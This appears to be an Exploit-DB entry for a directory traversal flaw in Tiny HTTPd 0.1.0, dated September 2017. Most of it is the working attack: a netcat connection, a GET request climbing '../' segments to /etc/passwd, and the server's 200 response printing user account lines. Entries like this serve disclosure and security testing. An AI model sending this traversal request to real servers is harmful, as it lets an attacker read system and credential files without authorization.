Tiny HTTPd 0.1.0 - Directory Traversal

Author: Touhid M.Shaikh
type: remote
platform: linux
port: 
date_added: 2017-09-26 
date_updated: 2017-09-27 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comtinyhttpd-0.1.0.tar.gz

#======================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal
# Date: 26-09-2017
# Website: www.touhidshaikh.com
# Vulnerable Software:  Tiny HTTPd
# Version: 0.1.0
# Download Link:
https://sourceforge.net/projects/tinyhttpd/?source=directory
#======================================================================================



# To reproduce the exploit:
#   1. run the #./httpd
#   2. #nc localhost 44123
# GET /../../../../../../../../../../../etc/passwd HTTP/1.1


#==========
#Responce
#==========


HTTP/1.0 200 OK
Server: jdbhttpd/0.1.0
Content-Type: text/html

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
---------------------snip---------------------------